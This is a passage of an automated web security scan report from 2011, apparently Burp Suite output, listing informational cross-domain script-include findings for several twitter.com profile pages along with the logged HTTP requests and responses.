<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369" type="text/javascript"></script>
...[SNIP]...

18.256. http://twitter.com/Chester_Pitts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Chester_Pitts

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664293-11125-61221
ETag: "3ccdf53e8260d1eff51f3d2b9026b12a"
Last-Modified: Wed, 02 Feb 2011 16:31:33 GMT
X-Runtime: 0.01152
Content-Type: text/html; charset=utf-8
Content-Length: 47210
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.257. http://twitter.com/Cirque previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Cirque

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:37 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664297-70994-58459
ETag: "92d6544c8d90a336b0610d8d835469b1"
Last-Modified: Wed, 02 Feb 2011 16:31:37 GMT
X-Runtime: 0.01158
Content-Type: text/html; charset=utf-8
Content-Length: 50104
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.258. http://twitter.com/JetBlue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/JetBlue

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664284-81226-52768
ETag: "c47332e62f2ab4dee197b8966177b9af"
Last-Modified: Wed, 02 Feb 2011 16:31:24 GMT
X-Runtime: 0.01093
Content-Type: text/html; charset=utf-8
Content-Length: 53698
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.259. http://twitter.com/JohnsHopkinsSPH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/JohnsHopkinsSPH

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:32 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664292-75706-5735
ETag: "dff3b91ce9bcd0d241c29140607e7ea4"
Last-Modified: Wed, 02 Feb 2011 16:31:32 GMT
X-Runtime: 0.01534
Content-Type: text/html; charset=utf-8
Content-Length: 53920
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/dismissable.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.260. http://twitter.com/McKQuarterly previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/McKQuarterly

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664272-53386-25173
ETag: "3c242bbb56a0c05a14e9b1d711d6d7ea"
Last-Modified: Wed, 02 Feb 2011 16:31:12 GMT
X-Runtime: 0.01305
Content-Type: text/html; charset=utf-8
Content-Length: 52512
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.261. http://twitter.com/MomsWhoSave previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/MomsWhoSave

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664257-5047-11533
ETag: "acc0dc7ccac73107ebe640e17bc8d39a"
Last-Modified: Wed, 02 Feb 2011 16:30:57 GMT
X-Runtime: 0.02116
Content-Type: text/html; charset=utf-8
Content-Length: 48426
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.262. http://twitter.com/NetworkConnects previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/NetworkConnects

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /NetworkConnects HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:29:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664156-93599-33528
ETag: "316f6d8a1d389704870557e877b55e8e"
Last-Modified: Wed, 02 Feb 2011 16:29:16 GMT
X-Runtime: 0.01439
Content-Type: text/html; charset=utf-8
Content-Length: 47786
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296615671" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.263. http://twitter.com/NetworkConnects previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/NetworkConnects

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527186
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527186
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296527186
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296527186
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296527186
http://a3.twimg.com/a/1296525272/javascripts/api.js?1296527186
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /NetworkConnects HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570798-63133-14648
ETag: "56c36945f01b3fa478765c1a8e7408bf"
Last-Modified: Tue, 01 Feb 2011 14:33:18 GMT
X-Runtime: 0.00770
Content-Type: text/html; charset=utf-8
Content-Length: 47947
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570798650092; path=/; expires=Tue, 08-Feb-11 14:33:18 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657079865736372; path=/; expires=Thu, 03 Mar 2011 14:33:18 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWEyN2JjYTllZTU4ZmQ5OWFkNzQ2MDFjNzgyMGI4Njk1Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIQlKk4S0B--c2869b37ba3e800b99d06240d4d63125f6c1aac4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296527186" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527186" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527186" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296527186" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/api.js?1296527186" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296527186" type="text/javascript"></script>
...[SNIP]...

18.264. http://twitter.com/Nightline previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Nightline

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
